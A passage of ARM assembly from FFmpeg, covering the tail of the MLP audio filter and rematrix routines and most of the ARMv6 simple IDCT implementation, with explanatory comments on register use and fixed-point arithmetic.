.set LOAD_REG, (LOAD_REG + 1) & 3
.set OFFSET_CO, OFFSET_CO + 4
.endr
.set OFFSET_CO, 4 * MAX_FIR_ORDER
.rept \iir_taps
load CO, LOAD_REG, PCO, OFFSET_CO
.set LOAD_REG, (LOAD_REG + 1) & 3
.set OFFSET_CO, OFFSET_CO + 4
.endr
.endif
// Move mask/shift to final positions if necessary
// Need to do this after preloading, because in some cases we
// reuse the coefficient pointer register
.if SHUFFLE_SHIFT
mov SHIFT, ST0
.endif
.if SHUFFLE_MASK
mov MASK, ST1
.endif
// Begin loop
01:
.if TOTAL_TAPS == 0
// Things simplify a lot in this case
// In fact this could be pipelined further if it's worth it...
ldr ST0, [PSAMP]
subs I, I, #1
.if !\mask_minus1
and ST0, ST0, MASK
.endif
str ST0, [PST, #-4]! // push onto FIR state history
str ST0, [PST, #4 * (MAX_BLOCKSIZE + MAX_FIR_ORDER)] // and IIR history
str ST0, [PSAMP], #4 * MAX_CHANNELS
bne 01b
.else
.if \fir_taps & 1
.set LOAD_REG, 1
.else
.set LOAD_REG, 0
.endif
.set LOAD_BANK, 0
.set FIR_REMAIN, \fir_taps
.set IIR_REMAIN, \iir_taps
.if FIR_REMAIN == 0 // only IIR terms
.set OFFSET_CO, 4 * MAX_FIR_ORDER
.set OFFSET_ST, 4 * (MAX_BLOCKSIZE + MAX_FIR_ORDER)
.else
.set OFFSET_CO, 0
.set OFFSET_ST, 0
.endif
.set MUL_REG, LOAD_REG
.set COUNTER, 0
// Unrolled pipeline: loads lead the multiplies by two slots.
.rept TOTAL_TAPS + 2
// Do load(s)
.if FIR_REMAIN != 0 || IIR_REMAIN != 0
.if COUNTER == 0
.if TOTAL_TAPS > 4
load CO, LOAD_REG, PCO, OFFSET_CO
.endif
load ST, LOAD_REG, PST, OFFSET_ST
inc 1
.elseif COUNTER == 1 && (\fir_taps & 1) == 0
.if TOTAL_TAPS > 4
load CO, LOAD_REG, PCO, OFFSET_CO
.endif
load ST, LOAD_REG, PST, OFFSET_ST
inc 1
.elseif LOAD_BANK == 0
.if TOTAL_TAPS > 4
.if FIR_REMAIN == 0 && IIR_REMAIN == 1
load CO, LOAD_REG, PCO, OFFSET_CO
.else
loadd CO, LOAD_REG, PCO, OFFSET_CO
.endif
.endif
.set LOAD_BANK, 1
.else
.if FIR_REMAIN == 0 && IIR_REMAIN == 1
load ST, LOAD_REG, PST, OFFSET_ST
inc 1
.else
loadd ST, LOAD_REG, PST, OFFSET_ST
inc 2
.endif
.set LOAD_BANK, 0
.endif
.endif
// Do interleaved multiplies, slightly delayed
.if COUNTER >= 2
multiply MUL_REG, COUNTER > 2, !\shift_0
.set MUL_REG, (MUL_REG + 1) & 3
.endif
.set COUNTER, COUNTER + 1
.endr
// Post-process the result of the multiplies
.if SPILL_SHIFT
ldr SHIFT, [sp, #9*4 + 0*4]
.endif
.if SPILL_MASK
ldr MASK, [sp, #9*4 + 1*4]
.endif
ldr ST2, [PSAMP]
subs I, I, #1
.if \shift_8
// 64-bit accumulator >> 8, done with a shift/or pair
mov AC0, AC0, lsr #8
orr AC0, AC0, AC1, lsl #24
.elseif !\shift_0
// general 64-bit accumulator >> SHIFT
rsb ST3, SHIFT, #32
mov AC0, AC0, lsr SHIFT
A orr AC0, AC0, AC1, lsl ST3
T mov AC1, AC1, lsl ST3
T orr AC0, AC0, AC1
.endif
.if \mask_minus1
add ST3, ST2, AC0
.else
// ST3 = masked result, ST2 = filter contribution alone (for IIR state)
add ST2, ST2, AC0
and ST3, ST2, MASK
sub ST2, ST3, AC0
.endif
str ST3, [PST, #-4]! // push onto FIR state history
str ST2, [PST, #4 * (MAX_BLOCKSIZE + MAX_FIR_ORDER)] // IIR history
str ST3, [PSAMP], #4 * MAX_CHANNELS
bne 01b
.endif
b 99f
.if DEFINED_SHIFT
.unreq SHIFT
.endif
.if DEFINED_MASK
.unreq MASK
.endif
.endm
// Dispatch on firorder (a3) through a position-independent jump table
// (ldr/add pc in ARM mode, tbh in Thumb), instantiating implement_filter
// for each legal FIR tap count.  firorder + iirorder <= 8, so higher
// entries are only emitted when \iir_taps leaves room for them.
.macro switch_on_fir_taps mask_minus1, shift_0, shift_8, iir_taps
A ldr CO0, [pc, a3, lsl #2] // firorder is in range 0-(8-iir_taps)
A add pc, pc, CO0
T tbh [pc, a3, lsl #1]
0:
branch_pic_label (70f - 0b), (71f - 0b), (72f - 0b), (73f - 0b)
branch_pic_label (74f - 0b)
.if \iir_taps <= 3
branch_pic_label (75f - 0b)
.if \iir_taps <= 2
branch_pic_label (76f - 0b)
.if \iir_taps <= 1
branch_pic_label (77f - 0b)
.if \iir_taps == 0
branch_pic_label (78f - 0b)
.endif
.endif
.endif
.endif
70: implement_filter \mask_minus1, \shift_0, \shift_8, \iir_taps, 0
71: implement_filter \mask_minus1, \shift_0, \shift_8, \iir_taps, 1
72: implement_filter \mask_minus1, \shift_0, \shift_8, \iir_taps, 2
73: implement_filter \mask_minus1, \shift_0, \shift_8, \iir_taps, 3
74: implement_filter \mask_minus1, \shift_0, \shift_8, \iir_taps, 4
.if \iir_taps <= 3
75: implement_filter \mask_minus1, \shift_0, \shift_8, \iir_taps, 5
.if \iir_taps <= 2
76: implement_filter \mask_minus1, \shift_0, \shift_8, \iir_taps, 6
.if \iir_taps <= 1
77: implement_filter \mask_minus1, \shift_0, \shift_8, \iir_taps, 7
.if \iir_taps == 0
78: implement_filter \mask_minus1, \shift_0, \shift_8, \iir_taps, 8
.endif
.endif
.endif
.endif
.endm
// Outer dispatch on iirorder (a4), same PIC jump-table technique.
.macro switch_on_iir_taps mask_minus1, shift_0, shift_8
A ldr CO0, [pc, a4, lsl #2] // iirorder is in range 0-4
A add pc, pc, CO0
T tbh [pc, a4, lsl #1]
0:
branch_pic_label (60f - 0b), (61f - 0b), (62f - 0b), (63f - 0b)
branch_pic_label (64f - 0b)
60: switch_on_fir_taps \mask_minus1, \shift_0, \shift_8, 0
61: switch_on_fir_taps \mask_minus1, \shift_0, \shift_8, 1
62: switch_on_fir_taps \mask_minus1, \shift_0, \shift_8, 2
63: switch_on_fir_taps \mask_minus1, \shift_0, \shift_8, 3
64: switch_on_fir_taps \mask_minus1, \shift_0, \shift_8, 4
.endm
/* void ff_mlp_filter_channel_arm(int32_t *state, const int32_t *coeff,
 * int firorder, int iirorder,
 * unsigned int filter_shift, int32_t mask,
 * int blocksize, int32_t *sample_buffer);
 *
 * Top-level dispatcher: specializes on mask == -1, shift == 0 and
 * shift == 8, then on iirorder/firorder, branching into the matching
 * implement_filter expansion (each of which returns via label 99).
 */
function ff_mlp_filter_channel_arm, export=1
push {v1-fp,lr}
add v1, sp, #9*4 // point at arguments on stack
ldm v1, {ST0,ST1,I,PSAMP} // shift, mask, blocksize, sample_buffer
cmp ST1, #-1 // mask == -1? (no masking needed)
bne 30f
movs ST2, ST0, lsl #29 // shift is in range 0-15; we want to special-case 0 and 8
// after lsl #29: Z = (shift & 7) == 0, C = bit 3 of shift
bne 20f
bcs 10f
switch_on_iir_taps 1, 1, 0 // mask==-1, shift==0
10: switch_on_iir_taps 1, 0, 1 // mask==-1, shift==8
20: switch_on_iir_taps 1, 0, 0 // mask==-1, generic shift
30: movs ST2, ST0, lsl #29 // shift is in range 0-15; we want to special-case 0 and 8
bne 50f
bcs 40f
switch_on_iir_taps 0, 1, 0 // masked, shift==0
40: switch_on_iir_taps 0, 0, 1 // masked, shift==8
50: switch_on_iir_taps 0, 0, 0 // masked, generic shift
99: pop {v1-fp,pc} // common exit for every implement_filter body
endfunc
// Release the register aliases used by the filter code above.
.unreq PST
.unreq PCO
.unreq AC0
.unreq AC1
.unreq CO0
.unreq CO1
.unreq CO2
.unreq CO3
.unreq ST0
.unreq ST1
.unreq ST2
.unreq ST3
.unreq I
.unreq PSAMP
/********************************************************************/
// Register aliases for the rematrix code below.
PSA .req a1 // samples
PCO .req a2 // coeffs
PBL .req a3 // bypassed_lsbs
INDEX .req a4
CO0 .req v1
CO1 .req v2
CO2 .req v3
CO3 .req v4
SA0 .req v5
SA1 .req v6
SA2 .req sl
SA3 .req fp
AC0 .req ip
AC1 .req lr
// The following aliases overlap SA0-SA3: they are only live in the
// post-accumulation phase, after the sample registers are dead.
NOISE .req SA0
LSB .req SA1
DCH .req SA2 // dest_ch
MASK .req SA3
// INDEX is used as follows:
// bits 0..6 index2 (values up to 17, but wider so that we can
// add to index field without needing to mask)
// bits 7..14 i (values up to 160)
// bit 15 underflow detect for i
// bits 25..31 (if access_unit_size_pow2 == 128) \ index
// bits 26..31 (if access_unit_size_pow2 == 64) /
// One specialised rematrix inner loop.
//   \shift      matrix_noise_shift baked in (0 => no noise injection)
//   \index_mask 63 or 127, selecting the noise-buffer index width
//               (only meaningful when \shift != 0)
//   \mask_minus1 nonzero => mask == -1, so the AND with MASK is skipped
//   \maxchan    1, 5 or 7: number of coefficient/sample pairs minus one
// Loops until the i counter packed into INDEX underflows (bit 15 set).
.macro implement_rematrix shift, index_mask, mask_minus1, maxchan
.if \maxchan == 1
// We can just leave the coefficients in registers in this case
ldrd CO0, CO1, [PCO]
.endif
1:
// Multiply-accumulate coeffs * samples into the 64-bit pair AC1:AC0.
// Loads are interleaved with the multiplies to hide latency; note the
// final CO1*SA1 term is issued after the ldm below, once sp scratch
// values have been fetched.
.if \maxchan == 1
ldrd SA0, SA1, [PSA]
smull AC0, AC1, CO0, SA0
.elseif \maxchan == 5
ldr CO0, [PCO, #0]
ldr SA0, [PSA, #0]
ldr CO1, [PCO, #4]
ldr SA1, [PSA, #4]
ldrd CO2, CO3, [PCO, #8]
smull AC0, AC1, CO0, SA0
ldrd SA2, SA3, [PSA, #8]
smlal AC0, AC1, CO1, SA1
ldrd CO0, CO1, [PCO, #16]
smlal AC0, AC1, CO2, SA2
ldrd SA0, SA1, [PSA, #16]
smlal AC0, AC1, CO3, SA3
smlal AC0, AC1, CO0, SA0
.else // \maxchan == 7
ldr CO2, [PCO, #0]
ldr SA2, [PSA, #0]
ldr CO3, [PCO, #4]
ldr SA3, [PSA, #4]
ldrd CO0, CO1, [PCO, #8]
smull AC0, AC1, CO2, SA2
ldrd SA0, SA1, [PSA, #8]
smlal AC0, AC1, CO3, SA3
ldrd CO2, CO3, [PCO, #16]
smlal AC0, AC1, CO0, SA0
ldrd SA2, SA3, [PSA, #16]
smlal AC0, AC1, CO1, SA1
ldrd CO0, CO1, [PCO, #24]
smlal AC0, AC1, CO2, SA2
ldrd SA0, SA1, [PSA, #24]
smlal AC0, AC1, CO3, SA3
smlal AC0, AC1, CO0, SA0
.endif
ldm sp, {NOISE, DCH, MASK} // reload spilled values (aliases SA0-SA3)
smlal AC0, AC1, CO1, SA1
.if \shift != 0
// Fetch a signed noise byte using the index field in INDEX's top bits,
// then advance that field modulo \index_mask+1 by self-adding the
// rotated copy of INDEX.
.if \index_mask == 63
add NOISE, NOISE, INDEX, lsr #32-6
ldrb LSB, [PBL], #MAX_CHANNELS
ldrsb NOISE, [NOISE]
add INDEX, INDEX, INDEX, lsl #32-6
.else // \index_mask == 127
add NOISE, NOISE, INDEX, lsr #32-7
ldrb LSB, [PBL], #MAX_CHANNELS
ldrsb NOISE, [NOISE]
add INDEX, INDEX, INDEX, lsl #32-7
.endif
sub INDEX, INDEX, #1<<7 // decrement loop counter i
adds AC0, AC0, NOISE, lsl #\shift + 7
adc AC1, AC1, NOISE, asr #31 // sign-extend noise into high word
.else
ldrb LSB, [PBL], #MAX_CHANNELS
sub INDEX, INDEX, #1<<7 // decrement loop counter i
.endif
add PSA, PSA, #MAX_CHANNELS*4
// Narrow the 64-bit accumulator: >> 14, keeping 32 result bits.
mov AC0, AC0, lsr #14
orr AC0, AC0, AC1, lsl #18
.if !\mask_minus1
and AC0, AC0, MASK
.endif
add AC0, AC0, LSB // reinstate the bypassed LSBs
tst INDEX, #1<<15 // i underflowed?
str AC0, [PSA, DCH, lsl #2] // DCH is precompensated for the early increment of PSA
beq 1b
b 98f
.endm
// Dispatch on maxchan (in v4): <5 => 1, ==5 => 5, otherwise 7.
// The entry code has already rejected any other value.
.macro switch_on_maxchan shift, index_mask, mask_minus1
cmp v4, #5
blo 51f
beq 50f
implement_rematrix \shift, \index_mask, \mask_minus1, 7
50: implement_rematrix \shift, \index_mask, \mask_minus1, 5
51: implement_rematrix \shift, \index_mask, \mask_minus1, 1
.endm
// Specialise on whether mask (in sl) is -1, in which case the masking
// AND can be omitted from the inner loop.
.macro switch_on_mask shift, index_mask
cmp sl, #-1
bne 40f
switch_on_maxchan \shift, \index_mask, 1
40: switch_on_maxchan \shift, \index_mask, 0
.endm
// Specialise on access_unit_size_pow2 (in v6): 64 or 128, which fixes
// the width of the noise index field packed into INDEX's top bits.
// Irrelevant when \shift == 0 since no noise is read at all.
.macro switch_on_au_size shift
.if \shift == 0
switch_on_mask \shift, undefined
.else
teq v6, #64
bne 30f
orr INDEX, INDEX, v1, lsl #32-6 // seed 6-bit noise index field
switch_on_mask \shift, 63
30: orr INDEX, INDEX, v1, lsl #32-7 // seed 7-bit noise index field
switch_on_mask \shift, 127
.endif
.endm
/* void ff_mlp_rematrix_channel_arm(int32_t *samples,
 *                                  const int32_t *coeffs,
 *                                  const uint8_t *bypassed_lsbs,
 *                                  const int8_t *noise_buffer,
 *                                  int index,
 *                                  unsigned int dest_ch,
 *                                  uint16_t blockpos,
 *                                  unsigned int maxchan,
 *                                  int matrix_noise_shift,
 *                                  int access_unit_size_pow2,
 *                                  int32_t mask);
 */
// Validates the parameter combinations the assembly supports
// (maxchan in {1,5,7}, access_unit_size_pow2 in {64,128}); anything
// else tail-calls the C implementation. Then packs the loop counter
// and noise index into INDEX (see layout comment above) and dispatches
// on matrix_noise_shift to a specialised inner loop.
function ff_mlp_rematrix_channel_arm, export=1
push {v1-fp,lr}
add v1, sp, #9*4 // point at arguments on stack
ldm v1, {v1-sl}
teq v4, #1
itt ne
teqne v4, #5
teqne v4, #7
bne 99f
teq v6, #64
it ne
teqne v6, #128
bne 99f
sub v2, v2, #MAX_CHANNELS // precompensate dest_ch for early PSA increment
push {a4,v2,sl} // initialise NOISE,DCH,MASK; make sp dword-aligned
movs INDEX, v3, lsl #7 // i = blockpos, in bits 7..14
beq 98f // just in case, do nothing if blockpos = 0
subs INDEX, INDEX, #1<<7 // offset by 1 so we borrow at the right time
adc lr, v1, v1 // calculate index2 (C was set by preceding subs)
orr INDEX, INDEX, lr
// Switch on matrix_noise_shift: values 0 and 1 are
// disproportionately common so do those in a form the branch
// predictor can accelerate. Values can only go up to 15.
cmp v5, #1
beq 11f
blo 10f
A ldr v5, [pc, v5, lsl #2]
A add pc, pc, v5
T tbh [pc, v5, lsl #1]
0:
// First two table slots are never reached (handled by the cmp above).
branch_pic_label 0, 0, (12f - 0b), (13f - 0b)
branch_pic_label (14f - 0b), (15f - 0b), (16f - 0b), (17f - 0b)
branch_pic_label (18f - 0b), (19f - 0b), (20f - 0b), (21f - 0b)
branch_pic_label (22f - 0b), (23f - 0b), (24f - 0b), (25f - 0b)
10: switch_on_au_size 0
11: switch_on_au_size 1
12: switch_on_au_size 2
13: switch_on_au_size 3
14: switch_on_au_size 4
15: switch_on_au_size 5
16: switch_on_au_size 6
17: switch_on_au_size 7
18: switch_on_au_size 8
19: switch_on_au_size 9
20: switch_on_au_size 10
21: switch_on_au_size 11
22: switch_on_au_size 12
23: switch_on_au_size 13
24: switch_on_au_size 14
25: switch_on_au_size 15
98: add sp, sp, #3*4 // drop the NOISE/DCH/MASK spill slots
pop {v1-fp,pc}
99: // Can't handle these parameters, drop back to C
pop {v1-fp,lr}
b X(ff_mlp_rematrix_channel)
endfunc
// Release the register aliases used by the rematrix code above.
.unreq PSA
.unreq PCO
.unreq PBL
.unreq INDEX
.unreq CO0
.unreq CO1
.unreq CO2
.unreq CO3
.unreq SA0
.unreq SA1
.unreq SA2
.unreq SA3
.unreq AC0
.unreq AC1
.unreq NOISE
.unreq LSB
.unreq DCH
.unreq MASK
/* ==== end of MLP DSP section (from repo Akagi201/ffmpeg-xcode) ==== */
/* ==== begin ffmpeg-3.0.2/libavcodec/arm/simple_idct_armv6.S ==== */
/*
* Simple IDCT
*
* Copyright (c) 2001 Michael Niedermayer <michaelni@gmx.at>
* Copyright (c) 2007 Mans Rullgard <mans@mansr.com>
*
* This file is part of FFmpeg.
*
* FFmpeg is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* FFmpeg is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with FFmpeg; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*/
#include "libavutil/arm/asm.S"
// Fixed-point IDCT coefficients: Wi = cos(i*M_PI/16)*sqrt(2) scaled by
// 1<<14 and rounded; W4 is 16383 (not 16384) to keep it in 15 bits.
#define W1 22725 /* cos(i*M_PI/16)*sqrt(2)*(1<<14) + 0.5 */
#define W2 21407 /* cos(i*M_PI/16)*sqrt(2)*(1<<14) + 0.5 */
#define W3 19266 /* cos(i*M_PI/16)*sqrt(2)*(1<<14) + 0.5 */
#define W4 16383 /* cos(i*M_PI/16)*sqrt(2)*(1<<14) + 0.5 */
#define W5 12873 /* cos(i*M_PI/16)*sqrt(2)*(1<<14) + 0.5 */
#define W6 8867 /* cos(i*M_PI/16)*sqrt(2)*(1<<14) + 0.5 */
#define W7 4520 /* cos(i*M_PI/16)*sqrt(2)*(1<<14) + 0.5 */
#define ROW_SHIFT 11
#define COL_SHIFT 20
// Coefficient pairs packed low|high for the dual-16-bit DSP multiplies.
#define W13 (W1 | (W3 << 16))
#define W26 (W2 | (W6 << 16))
#define W42 (W4 | (W2 << 16))
#define W42n (-W4&0xffff | (-W2 << 16))
#define W46 (W4 | (W6 << 16))
#define W57 (W5 | (W7 << 16))
/*
  Compute partial IDCT of single row.
  shift = left-shift amount
  r0 = source address
  r2 = row[2,0] <= 2 cycles
  r3 = row[3,1]
  ip = w42 <= 2 cycles
  Output in registers r4--r11:
    r4-r7 = even part A0-A3, r8 = B0, r9 = -B1, r10 = B2, r11 = B3
*/
.macro idct_row shift
ldr lr, =W46 /* lr = W4 | (W6 << 16) */
mov r1, #(1<<(\shift-1)) /* rounding bias */
smlad r4, r2, ip, r1
smlsd r7, r2, ip, r1
ldr ip, =W13 /* ip = W1 | (W3 << 16) */
ldr r10,=W57 /* r10 = W5 | (W7 << 16) */
smlad r5, r2, lr, r1
smlsd r6, r2, lr, r1
smuad r8, r3, ip /* r8 = B0 = W1*row[1] + W3*row[3] */
smusdx r11,r3, r10 /* r11 = B3 = W7*row[1] - W5*row[3] */
ldr lr, [r0, #12] /* lr = row[7,5] */
pkhtb r2, ip, r10,asr #16 /* r2 = W7 | (W3 << 16) */
pkhbt r1, ip, r10,lsl #16 /* r1 = W1 | (W5 << 16) */
smusdx r9, r2, r3 /* r9 = -B1 = W7*row[3] - W3*row[1] */
smlad r8, lr, r10,r8 /* B0 += W5*row[5] + W7*row[7] */
smusdx r10,r3, r1 /* r10 = B2 = W5*row[1] - W1*row[3] */
ldr r3, =W42n /* r3 = -W4 | (-W2 << 16) */
smlad r10,lr, r2, r10 /* B2 += W7*row[5] + W3*row[7] */
ldr r2, [r0, #4] /* r2 = row[6,4] */
smlsdx r11,lr, ip, r11 /* B3 += W3*row[5] - W1*row[7] */
ldr ip, =W46 /* ip = W4 | (W6 << 16) */
smlad r9, lr, r1, r9 /* B1 -= W1*row[5] + W5*row[7] */
smlad r5, r2, r3, r5 /* A1 += -W4*row[4] - W2*row[6] */
smlsd r6, r2, r3, r6 /* A2 += -W4*row[4] + W2*row[6] */
smlad r4, r2, ip, r4 /* A0 += W4*row[4] + W6*row[6] */
smlsd r7, r2, ip, r7 /* A3 += W4*row[4] - W6*row[6] */
.endm
/*
  Compute partial IDCT of half row (rows 4-7 known to be zero, so all
  the row[4..7] accumulation terms of idct_row are omitted).
  shift = left-shift amount
  r2 = row[2,0]
  r3 = row[3,1]
  ip = w42
  Output in registers r4--r11 (same layout as idct_row)
*/
.macro idct_row4 shift
ldr lr, =W46 /* lr = W4 | (W6 << 16) */
ldr r10,=W57 /* r10 = W5 | (W7 << 16) */
mov r1, #(1<<(\shift-1)) /* rounding bias */
smlad r4, r2, ip, r1
smlsd r7, r2, ip, r1
ldr ip, =W13 /* ip = W1 | (W3 << 16) */
smlad r5, r2, lr, r1
smlsd r6, r2, lr, r1
smusdx r11,r3, r10 /* r11 = B3 = W7*row[1] - W5*row[3] */
smuad r8, r3, ip /* r8 = B0 = W1*row[1] + W3*row[3] */
pkhtb r2, ip, r10,asr #16 /* r2 = W7 | (W3 << 16) */
pkhbt r1, ip, r10,lsl #16 /* r1 = W1 | (W5 << 16) */
smusdx r9, r2, r3 /* r9 = -B1 = W7*row[3] - W3*row[1] */
smusdx r10,r3, r1 /* r10 = B2 = W5*row[1] - W1*row[3] */
.endm
/*
  Compute final part of IDCT single row without shift.
  Input in registers r4--r11 (r9 holds -B1, see idct_row)
  Output in registers ip, r4--r6, lr, r8--r10
*/
.macro idct_finish
add ip, r4, r8 /* ip = A0 + B0 */
sub lr, r4, r8 /* lr = A0 - B0 */
sub r4, r5, r9 /* r4 = A1 + B1 (r9 = -B1) */
add r8, r5, r9 /* r8 = A1 - B1 */
add r5, r6, r10 /* r5 = A2 + B2 */
sub r9, r6, r10 /* r9 = A2 - B2 */
add r6, r7, r11 /* r6 = A3 + B3 */
sub r10,r7, r11 /* r10 = A3 - B3 */
.endm
/*
  Compute final part of IDCT single row.
  shift = right-shift amount
  Input/output in registers r4--r11 (input r9 holds -B1)
  Output order: r4-r7 = out[0..3], r11-r8 = out[4..7]
*/
.macro idct_finish_shift shift
add r3, r4, r8 /* r3 = A0 + B0 */
sub r2, r4, r8 /* r2 = A0 - B0 */
mov r4, r3, asr #\shift
mov r8, r2, asr #\shift
sub r3, r5, r9 /* r3 = A1 + B1 */
add r2, r5, r9 /* r2 = A1 - B1 */
mov r5, r3, asr #\shift
mov r9, r2, asr #\shift
add r3, r6, r10 /* r3 = A2 + B2 */
sub r2, r6, r10 /* r2 = A2 - B2 */
mov r6, r3, asr #\shift
mov r10,r2, asr #\shift
add r3, r7, r11 /* r3 = A3 + B3 */
sub r2, r7, r11 /* r2 = A3 - B3 */
mov r7, r3, asr #\shift
mov r11,r2, asr #\shift
.endm
/*
  Compute final part of IDCT single row, saturating results at 8 bits
  (unsigned, via usat) for direct pixel output.
  shift = right-shift amount
  Input/output in registers r4--r11 (input r9 holds -B1)
*/
.macro idct_finish_shift_sat shift
add r3, r4, r8 /* r3 = A0 + B0 */
sub ip, r4, r8 /* ip = A0 - B0 */
usat r4, #8, r3, asr #\shift
usat r8, #8, ip, asr #\shift
sub r3, r5, r9 /* r3 = A1 + B1 */
add ip, r5, r9 /* ip = A1 - B1 */
usat r5, #8, r3, asr #\shift
usat r9, #8, ip, asr #\shift
add r3, r6, r10 /* r3 = A2 + B2 */
sub ip, r6, r10 /* ip = A2 - B2 */
usat r6, #8, r3, asr #\shift
usat r10,#8, ip, asr #\shift
add r3, r7, r11 /* r3 = A3 + B3 */
sub ip, r7, r11 /* ip = A3 - B3 */
usat r7, #8, r3, asr #\shift
usat r11,#8, ip, asr #\shift
.endm
/*
  Compute IDCT of single row, storing as column.
  r0 = source
  r1 = dest
  Fast paths: if coefficients 1-7 are all zero, the output is just the
  DC value replicated (label 1); if only rows 0-3 are nonzero, the
  half-row transform idct_row4 is used (label 2).
*/
function idct_row_armv6
push {lr}
ldr lr, [r0, #12] /* lr = row[7,5] */
ldr ip, [r0, #4] /* ip = row[6,4] */
ldr r3, [r0, #8] /* r3 = row[3,1] */
ldr r2, [r0] /* r2 = row[2,0] */
orrs lr, lr, ip
itt eq
cmpeq lr, r3
cmpeq lr, r2, lsr #16 /* all of row[1..7] zero? */
beq 1f
push {r1}
ldr ip, =W42 /* ip = W4 | (W2 << 16) */
cmp lr, #0
beq 2f
idct_row ROW_SHIFT
b 3f
2: idct_row4 ROW_SHIFT
3: pop {r1}
idct_finish_shift ROW_SHIFT
/* store transposed: row elements go down a 16-halfword-pitch column */
strh r4, [r1]
strh r5, [r1, #(16*2)]
strh r6, [r1, #(16*4)]
strh r7, [r1, #(16*6)]
strh r11,[r1, #(16*1)]
strh r10,[r1, #(16*3)]
strh r9, [r1, #(16*5)]
strh r8, [r1, #(16*7)]
pop {pc}
1: mov r2, r2, lsl #3 /* DC-only: out = dc << 3 everywhere */
strh r2, [r1]
strh r2, [r1, #(16*2)]
strh r2, [r1, #(16*4)]
strh r2, [r1, #(16*6)]
strh r2, [r1, #(16*1)]
strh r2, [r1, #(16*3)]
strh r2, [r1, #(16*5)]
strh r2, [r1, #(16*7)]
pop {pc}
endfunc
/*
  Compute IDCT of single column, read as row (the row pass stored its
  output transposed, so this operates on contiguous halfwords).
  r0 = source
  r1 = dest
*/
function idct_col_armv6
push {r1, lr}
ldr r2, [r0] /* r2 = row[2,0] */
ldr ip, =W42 /* ip = W4 | (W2 << 16) */
ldr r3, [r0, #8] /* r3 = row[3,1] */
idct_row COL_SHIFT
pop {r1}
idct_finish_shift COL_SHIFT
strh r4, [r1]
strh r5, [r1, #(16*1)]
strh r6, [r1, #(16*2)]
strh r7, [r1, #(16*3)]
strh r11,[r1, #(16*4)]
strh r10,[r1, #(16*5)]
strh r9, [r1, #(16*6)]
strh r8, [r1, #(16*7)]
pop {pc}
endfunc
/*
  Compute IDCT of single column, read as row, store saturated 8-bit.
  r0 = source
  r1 = dest (updated: advanced down the column then rewound)
  r2 = line size
*/
function idct_col_put_armv6
push {r1, r2, lr}
ldr r2, [r0] /* r2 = row[2,0] */
ldr ip, =W42 /* ip = W4 | (W2 << 16) */
ldr r3, [r0, #8] /* r3 = row[3,1] */
idct_row COL_SHIFT
pop {r1, r2}
idct_finish_shift_sat COL_SHIFT
strb_post r4, r1, r2
strb_post r5, r1, r2
strb_post r6, r1, r2
strb_post r7, r1, r2
strb_post r11,r1, r2
strb_post r10,r1, r2
strb_post r9, r1, r2
strb_post r8, r1, r2
sub r1, r1, r2, lsl #3 /* rewind dest to top of column */
pop {pc}
endfunc
/*
  Compute IDCT of single column, read as row, add to existing pixels
  and store saturated 8-bit.
  r0 = source
  r1 = dest (updated: advanced down the column then rewound)
  r2 = line size
  Pixel loads are interleaved with the adds; loads at [r1, r2, lsl #2]
  pick up pixels four lines ahead of the current store position.
*/
function idct_col_add_armv6
push {r1, r2, lr}
ldr r2, [r0] /* r2 = row[2,0] */
ldr ip, =W42 /* ip = W4 | (W2 << 16) */
ldr r3, [r0, #8] /* r3 = row[3,1] */
idct_row COL_SHIFT
pop {r1, r2}
idct_finish
ldrb r3, [r1]
ldrb r7, [r1, r2]
ldrb r11,[r1, r2, lsl #2] /* NOTE(review): appears overwritten by the
                             identical load below before use -- confirm */
add ip, r3, ip, asr #COL_SHIFT
usat ip, #8, ip
add r4, r7, r4, asr #COL_SHIFT
strb_post ip, r1, r2
ldrb ip, [r1, r2]
usat r4, #8, r4
ldrb r11,[r1, r2, lsl #2]
add r5, ip, r5, asr #COL_SHIFT
usat r5, #8, r5
strb_post r4, r1, r2
ldrb r3, [r1, r2]
ldrb ip, [r1, r2, lsl #2]
strb_post r5, r1, r2
ldrb r7, [r1, r2]
ldrb r4, [r1, r2, lsl #2]
add r6, r3, r6, asr #COL_SHIFT
usat r6, #8, r6
add r10,r7, r10,asr #COL_SHIFT
usat r10,#8, r10
add r9, r11,r9, asr #COL_SHIFT
usat r9, #8, r9
add r8, ip, r8, asr #COL_SHIFT
usat r8, #8, r8
add lr, r4, lr, asr #COL_SHIFT
usat lr, #8, lr
strb_post r6, r1, r2
strb_post r10,r1, r2
strb_post r9, r1, r2
strb_post r8, r1, r2
strb_post lr, r1, r2
sub r1, r1, r2, lsl #3 /* rewind dest to top of column */
pop {pc}
endfunc
/*
  Compute 8 IDCT row transforms.
  func = IDCT row->col function (called with r0 = src row, r1 = dst)
  width = width of columns in bytes
  Source pointer advances 32 bytes per call except after calls 4 and 8,
  where it rewinds so rows are processed in order 0,2,4,6,1,3,5,7 and
  r0 ends back at the start of the block.
*/
.macro idct_rows func width
bl \func
add r0, r0, #(16*2)
add r1, r1, #\width
bl \func
add r0, r0, #(16*2)
add r1, r1, #\width
bl \func
add r0, r0, #(16*2)
add r1, r1, #\width
bl \func
sub r0, r0, #(16*5)
add r1, r1, #\width
bl \func
add r0, r0, #(16*2)
add r1, r1, #\width
bl \func
add r0, r0, #(16*2)
add r1, r1, #\width
bl \func
add r0, r0, #(16*2)
add r1, r1, #\width
bl \func
sub r0, r0, #(16*7)
.endm
/* void ff_simple_idct_armv6(int16_t *data); */
// In-place 8x8 IDCT: row pass into a 128-byte stack buffer (stored
// transposed), then column pass from that buffer back into data.
function ff_simple_idct_armv6, export=1
push {r4-r11, lr}
sub sp, sp, #128 // temp 8x8 int16 block
mov r1, sp
idct_rows idct_row_armv6, 2
mov r1, r0
mov r0, sp
idct_rows idct_col_armv6, 2
add sp, sp, #128
pop {r4-r11, pc}
endfunc
/* ff_simple_idct_add_armv6(uint8_t *dest, int line_size, int16_t *data); */
// IDCT then add-with-saturation into dest. dest/line_size are kept on
// the stack across the row pass and reloaded for the column pass.
function ff_simple_idct_add_armv6, export=1
push {r0, r1, r4-r11, lr}
sub sp, sp, #128 // temp 8x8 int16 block
mov r0, r2
mov r1, sp
idct_rows idct_row_armv6, 2
mov r0, sp
